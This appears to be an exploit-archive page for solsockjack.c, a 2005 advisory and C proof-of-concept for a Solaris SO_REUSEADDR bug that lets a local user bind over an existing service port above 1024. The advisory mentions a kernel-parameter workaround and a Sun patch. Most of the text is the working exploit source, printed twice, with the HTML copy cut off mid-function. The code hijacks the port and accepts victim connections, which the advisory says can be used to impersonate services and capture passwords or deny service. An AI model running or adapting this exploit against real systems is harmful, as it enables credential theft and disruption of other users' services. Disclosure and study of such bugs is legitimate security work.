exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

solsockjack.c

solsockjack.c
Posted Jul 7, 2005
Authored by c0ntex

Solaris has a bug in the use of SO_REUSEADDR in that the kernel favors any socket binding operation that is more specific than the general *.* wildcard bind(). Due to this, a malicious socket can bind to an already bound interface if a specific IP address is used. Exploit included.

tags | exploit, kernel
systems | solaris
SHA-256 | 9a57bfc1f13e75c3b857db7f9fa66b1d8bc8b6525ba1d8a4eed4fea59f468b53

solsockjack.c

Change Mirror Download
------=_Part_12546_22614564.1120652641174
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

/*
***************************************************************************=
**************************************
$ An open security advisory #7 - SUN Solaris SO_REUSEADDR Local Socket=20
Hijack Bug
***************************************************************************=
**************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Local / Remote
***************************************************************************=
**************************************
$ This advisory and/or proof of concept code must not be used for commercia=
l=20
gain.
***************************************************************************=
**************************************

Sun MicroSystems
http://www.sun.com

Solaris has a bug in the use of SO_REUSEADDR in that the Kernel favours any=
=20
socket binding operation that
is more specific than the general "*.*" wildcard bind(). As such, a=20
malicious socket can bind to an already
bound interface if a specific IP address is used.

This hijack can be performed against any process over 1024, including root=
=20
owned services, it is not limited
to your own user account. One can then mimic the original service and snoop=
=20
usernames / passwords, files and
data with a trojan version of software, or just cause a DOS against the=20
legitimate service, providing the
service is bound to a port above 1024 and uses the SO_REUSEADDR option.

Anyway, a work around could be setting the port numbers that are valuable t=
o=20
the system as privileged. Using
the following kernel parameter, you can set ports above 1024 to act as=20
reserved so only root can bind to them.

tcp_extra_priv_ports_add

To view privileged ports, run the following command:

ndd /dev/tcp tcp_extra_priv_ports

To set ports as privileged, run the following command:

ndd -set /dev/tcp tcp_extra_priv_ports_add 8080

Effected: All Solaris versions.
Not effected: Linux, OpenBSD, FreeBSD, Windows.

SUN have released a patch for the issue which can be downloaded from=20
sunsolve.

Document Audience: PUBLIC
Document ID: 116965-08
Title: Obsoleted by: 116965-09 SunOS 5.8: ip/arp/tcp/udp patch
Update Date: Thu May 05 09:28:25 MDT 2005
See Patch Revision History

Patch Id: 116965-08

Problem Description:=20

5089150 Binding to a port which has already been bound may incorrectly=20
succeed

*/

/* solsockjack.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <arpa/inet.h>

#define BAD "!@#$%^&*()-_=3D+[]{};':\",/<>?\\|`~=20
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
#define DEFHOST "localhost"
#define MAX_INCONN 1
#define PORT 1241 /* Nessus */
#define SYSTEM "SunOS"

#define BL "\x1B[1;34m"
#define NO "\x1B[0m"
#define PI "\x1B[35m"
#define PU "\x1B[1;35m"
#define RE "\x1B[1;31m"
#define WH "\x1B[1;37m"
#define YE "\x1B[1;33m"

void
banner(void)
{
fprintf(stderr, "\n%s[-] %sSUN Solaris SPARC / x86 Local Socket Hijack=20
Exploit\n", YE, NO);
fprintf(stderr, "%s[-] %sKernel issue allows a bind on an already bound=20
socket\n", YE, NO);
fprintf(stderr, "%s[-] %sallowing a malicious user to impersonate a service=
=20
that\n", YE, NO);
fprintf(stderr, "%s[-] %sis already running on a port greater than 1024,=20
making\n", YE, NO);
fprintf(stderr, "%s[-] %sservice-in-the-middle attacks a trivial task to=20
perform.\n", YE, NO);
fprintf(stderr, "%s[-] %sDeveloped by c0ntex || c0ntexb@gmail.com%s\n\n",=
=20
YE, WH, NO);

_exit(EXIT_SUCCESS);
}

void
usage(int argc, char **argv)
{
fprintf(stderr, "%s[-] %s Usage:\n", YE, NO);
fprintf(stderr, "%s[-] %s\t -h \t\tIP address to bind socket to\n", YE, NO)=
;
fprintf(stderr, "%s[-] %s\t -p \t\tport number to attempt hijack of\n", YE,=
=20
NO);
fprintf(stderr, "%s[-] %s\t -v \t\tPrints this help\n", YE, NO);

fprintf(stderr, "%s[-] %s%s -h 10.1.1.215 <http://10.1.1.215> -p 1241\n\n",=
=20
YE, NO, argv[0]);

_exit(EXIT_FAILURE);
}

void
checkerr(char *isvuln)
{
free(isvuln);
puts("Not today!");
_exit(EXIT_FAILURE);
}

void
jackerr(char *vulnerable)
{
free(vulnerable);
_exit(EXIT_FAILURE);
}

char
*checksys(char *isvuln)
{
struct utsname name;

if(uname(&name) < 0) {
puts("uname failed");
}

isvuln =3D malloc(6);
if(!isvuln) {
perror("malloc");
_exit(EXIT_FAILURE);
}

if((name.sysname =3D=3D NULL) || (strlen(name.sysname) < 1) || (strlen(
name.sysname) > 5)) {
checkerr(isvuln);
}

memcpy(isvuln, name.sysname, strlen(name.sysname));
if(!isvuln) {
checkerr(isvuln);
}

return(isvuln);
}

int
main(int argc, char **argv)
{
int inbuf, jacksock, opts, solvuln;
int port =3D PORT;

char *vulnerable =3D NULL;
char *systype =3D NULL;
char *isvuln =3D NULL;
char *bad =3D NULL;

struct sockaddr_in solaris, victims;

if(argc < 2) {
banner();
_exit(EXIT_FAILURE);
}

if((systype =3D checksys(isvuln)) =3D=3D NULL) {
puts("Something messed up!");
checkerr(isvuln);
}

if(strcmp(SYSTEM, systype) !=3D 0) {
puts("System is not supported - SunOS only!");
checkerr(isvuln);
}

fprintf(stderr, "\n%s-> %sOK, potential vulnerable %s[%s] %ssystem,=20
continuing..\n", WH, NO, BL, systype, NO);

free(isvuln); sleep(2);

while((opts =3D getopt(argc, argv, "h:p:v")) !=3D -1) {
switch(opts)
{
case 'h':
bad =3D BAD;
vulnerable =3D malloc(16);
if(!vulnerable) {
perror("malloc");
_exit(EXIT_FAILURE);
}

if((optarg =3D=3D NULL) || (strlen(optarg) < 7) || (strlen(optarg) > 15) ||=
=20
strpbrk(bad, optarg)) {
puts("\n[-] Failed: IP address just isn't right!\n");
jackerr(vulnerable);
}

memcpy(vulnerable, optarg, strlen(optarg));
if(!vulnerable) {
jackerr(vulnerable);
}
break;
case 'p':
port =3D atoi(optarg);
if((port < 1024) || (port > 65535)) {
puts("\n[-] Failed: Port number just isn't right!\n");
usage(argc, argv);
_exit(EXIT_FAILURE);
}
break;
case 'v':
usage(argc, argv);
break;
default:
usage(argc, argv);
break;
}
}

if(vulnerable =3D=3D NULL) {
jackerr(vulnerable);
}

fprintf(stderr, "%s-> %sJacking port %s[%d] %sat address %s[%s]%s\n", WH,=
=20
NO, PI, port, NO, PU, vulnerable, NO);

jacksock =3D socket(AF_INET, SOCK_STREAM, 0);
if(jacksock < 0) {
perror("socket");
jackerr(vulnerable);
} sleep(2);

if(setsockopt(jacksock, SOL_SOCKET, SO_REUSEADDR, &solvuln, sizeof(int)) <=
=20
0) {
perror("setsockopt");
}

solaris.sin_family =3D AF_INET;
solaris.sin_port =3D htons(port);
solaris.sin_addr.s_addr =3D inet_addr(vulnerable);
memset(&solaris.sin_zero, '\0', sizeof(solaris.sin_zero));

if(bind(jacksock, (struct sockaddr *)&solaris, sizeof(struct sockaddr)) < 0=
)=20
{
perror("bind");
fprintf(stderr, "[-] %sFailed: %sCould not snag port, must be patched!\n",=
=20
RE, NO);
jackerr(vulnerable);
}

fprintf(stderr, "%s-> %s%sSuccess!! %sPort %s[%d] %shas been hijacked!\n%s-=
>=20
%sWait...\n", WH, NO, YE, NO, PI, port, NO, WH, NO);

if(listen(jacksock, MAX_INCONN) < 0) {
perror("listen");
puts("[-] Failed: Could not listen for an incoming connection!");
jackerr(vulnerable);
} sleep(2);

fprintf(stderr, "%s-> %sOK, listening for incoming connections to=20
compromise", WH, NO);

inbuf =3D sizeof(victims);

if(accept(jacksock, (struct sockaddr *)&victims, &inbuf) < 0) {
perror("accept");
puts("[-] Failed: Could not accept the incoming connection!");
jackerr(vulnerable);
}

fprintf(stderr, "\n%s-> %sSnagged a victim connecting from %s[%s]%s\n", WH,=
=20
NO, YE, inet_ntoa(victims.sin_addr), NO);

sleep(1);

close(jacksock);

puts("-> Victim has been released to live another day!");

sleep(1);

puts("-> Test was a success!");

free(vulnerable);

return(0);
}

------=_Part_12546_22614564.1120652641174
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

&nbsp;/*<br>
&nbsp; ********************************************************************=
*********************************************<br>
&nbsp; $ An open security advisory #7 - SUN Solaris SO_REUSEADDR Local Sock=
et Hijack Bug<br>
&nbsp; ********************************************************************=
*********************************************<br>
&nbsp; 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com<br>
&nbsp; 2: Bug Released: July 06 2005<br>
&nbsp; 3: Bug Impact Rate: Medium / Hi<br>
&nbsp; 4: Bug Scope Rate: Local / Remote<br>
&nbsp; ********************************************************************=
*********************************************<br>
&nbsp; $ This advisory and/or proof of concept code must not be used for co=
mmercial gain.<br>
&nbsp; ********************************************************************=
*********************************************<br>
<br>
&nbsp; Sun MicroSystems<br>
&nbsp; <a href=3D"http://www.sun.com">http://www.sun.com</a><br>
<br>
&nbsp; Solaris has a bug in the use of SO_REUSEADDR in that the Kernel favo=
urs any socket binding operation that<br>
&nbsp; is more specific than the general "*.*" wildcard bind(). A=
s such, a malicious socket can bind to an already<br>
&nbsp; bound interface if a specific IP address is used.<br>
<br>
&nbsp; This hijack can be performed against any process over 1024, includin=
g root owned services, it is not limited<br>
&nbsp; to your own user account. One can then mimic the original service an=
d snoop usernames / passwords, files and<br>
&nbsp; data with a trojan version of software, or just cause a DOS against =
the legitimate service, providing the<br>
&nbsp; service is bound to a port above 1024 and uses the SO_REUSEADDR opti=
on.<br>
<br>
&nbsp; Anyway, a work around could be setting the port numbers that are val=
uable to the system as privileged. Using<br>
&nbsp; the following kernel parameter, you can set ports above 1024 to act =
as reserved so only root can bind to them.<br>
<br>
&nbsp;&nbsp; &nbsp;tcp_extra_priv_ports_add<br>
<br>
&nbsp; To view privileged ports, run the following command:<br>
<br>
&nbsp;&nbsp; &nbsp;ndd /dev/tcp tcp_extra_priv_ports<br>
<br>
&nbsp; To set ports as privileged, run the following command:<br>
<br>
&nbsp;&nbsp; &nbsp;ndd -set /dev/tcp tcp_extra_priv_ports_add 8080<br>
<br>
&nbsp; Effected: All Solaris versions.<br>
&nbsp; Not effected: Linux, OpenBSD, FreeBSD, Windows.<br>
<br>
&nbsp; SUN have released a patch for the issue which can be downloaded from=
sunsolve.<br>
<br>
&nbsp; Document Audience:&nbsp;&nbsp; &nbsp;PUBLIC<br>
&nbsp; Document ID:&nbsp;&nbsp; &nbsp;116965-08<br>
&nbsp; Title:&nbsp;&nbsp; &nbsp;Obsoleted by: 116965-09 SunOS 5.8: ip/arp/t=
cp/udp patch<br>
&nbsp; Update Date:&nbsp;&nbsp; &nbsp;Thu May 05 09:28:25 MDT 2005<br>
&nbsp; See Patch Revision History<br>
<br>
&nbsp; Patch Id: 116965-08<br>
<br>
&nbsp; Problem Description: <br>
<br>
&nbsp; 5089150 Binding to a port which has already been bound may incorrect=
ly succeed<br>
<br>
*/<br>
<br>
/* solsockjack.c */<br>
#include <stdlib.h><br>
#include <stdio.h><br>
#include <string.h><br>
#include <unistd.h><br>
#include <netinet/in.h><br>
#include <sys/socket.h><br>
#include <sys/types.h><br>
#include <sys/utsname.h><br>
#include <arpa/inet.h><br>
<br>
#define
BAD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
"!@#$%^&*()-_=3D+[]{};':\",/<>?\\|`~
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"<br>
#define DEFHOST&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "local=
host"<br>
#define MAX_INCONN&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<br>
#define
PORT&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
1241 &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;/* Nessus */<br>
#define SYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "=
SunOS"<br>
<br>
#define BL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; "\x1B[1;34m"<br>
#define NO&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; "\x1B[0m"<br>
#define PI&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; "\x1B[35m"<br>
#define PU&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; "\x1B[1;35m"<br>
#define RE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; "\x1B[1;31m"<br>
#define WH&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; "\x1B[1;37m"<br>
#define YE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; "\x1B[1;33m"<br>
<br>
void<br>
banner(void)<br>
{<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "\n%s[-]
%sSUN Solaris SPARC / x86 Local Socket Hijack Exploit\n", YE, NO);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s[-]
%sKernel issue allows a bind on an already bound socket\n", YE, NO);<b=
r>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s[-]
%sallowing a malicious user to impersonate a service that\n", YE, NO);=
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s[-] %sis
already running on a port greater than 1024, making\n", YE, NO);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s[-]
%sservice-in-the-middle attacks a trivial task to perform.\n", YE, NO)=
;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s[-]
%sDeveloped by c0ntex || c0ntexb@gmail.com%s\n\n", YE, WH, NO);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _exit(EXIT_SUCCESS);<br>
}<br>
<br>
void<br>
usage(int argc, char **argv)<br>
{<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s[-] %s U=
sage:\n", YE, NO);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s[-] %s\t=
-h \t\tIP address to bind socket to\n", YE, NO);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s[-] %s\t=
-p \t\tport number to attempt hijack of\n", YE, NO);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s[-] %s\t=
-v \t\tPrints this help\n", YE, NO);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s[-] %s%s=
-h <a href=3D"http://10.1.1.215">10.1.1.215</a> -p 1241\n\n", YE, NO,=
argv[0]);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _exit(EXIT_FAILURE);<br>
}<br>
<br>
void<br>
checkerr(char *isvuln)<br>
{<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; free(isvuln);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; puts("Not today!");<br=
>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _exit(EXIT_FAILURE);<br>
}<br>
<br>
void<br>
jackerr(char *vulnerable)<br>
{<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; free(vulnerable);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _exit(EXIT_FAILURE);<br>
}<br>
<br>
char<br>
*checksys(char *isvuln)<br>
{<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; struct utsname name;<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(uname(&name) < 0) {<br=
>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; puts("uname failed");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; isvuln =3D malloc(6);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(!isvuln) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; perror("malloc");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; _exit(EXIT_FAILURE);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if((name.sysname =3D=3D NULL) ||
(strlen(name.sysname) < 1) || (strlen(name.sysname) > 5)) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; checkerr(isvuln);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memcpy(isvuln, name.sysname, str=
len(name.sysname));<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(!isvuln) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; checkerr(isvuln);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return(isvuln);<br>
}<br>
<br>
int<br>
main(int argc, char **argv)<br>
{<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int inbuf, jacksock, opts, solvu=
ln;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int port =3D PORT;<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char *vulnerable =3D NULL;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char *systype =3D NULL;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char *isvuln =3D NULL;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char *bad =3D NULL;<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; struct sockaddr_in solaris, vict=
ims;<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(argc < 2) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; banner();<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; _exit(EXIT_FAILURE);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if((systype =3D checksys(isvuln)=
) =3D=3D NULL) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; puts("Something messed up!");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; checkerr(isvuln);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(strcmp(SYSTEM, systype) !=3D =
0) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;
puts("System is not supported - SunOS only!");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; checkerr(isvuln);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "\n%s->
%sOK, potential vulnerable %s[%s] %ssystem, continuing..\n", WH, NO,
BL, systype, NO);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; free(isvuln); sleep(2);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; while((opts =3D getopt(argc, arg=
v, "h:p:v")) !=3D -1) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; switch(opts)<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
{<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
case 'h':<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
bad =3D BAD;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
vulnerable =3D malloc(16);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(!vulnerable) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;
perror("malloc");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;
_exit(EXIT_FAILURE);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if((optarg =3D=3D NULL) || (strlen(optarg) < 7) || (strlen(optarg) >
15) || strpbrk(bad, optarg)) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;
puts("\n[-] Failed: IP address just isn't right!\n");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;
jackerr(vulnerable);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
memcpy(vulnerable, optarg, strlen(optarg));<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(!vulnerable) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;
jackerr(vulnerable);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
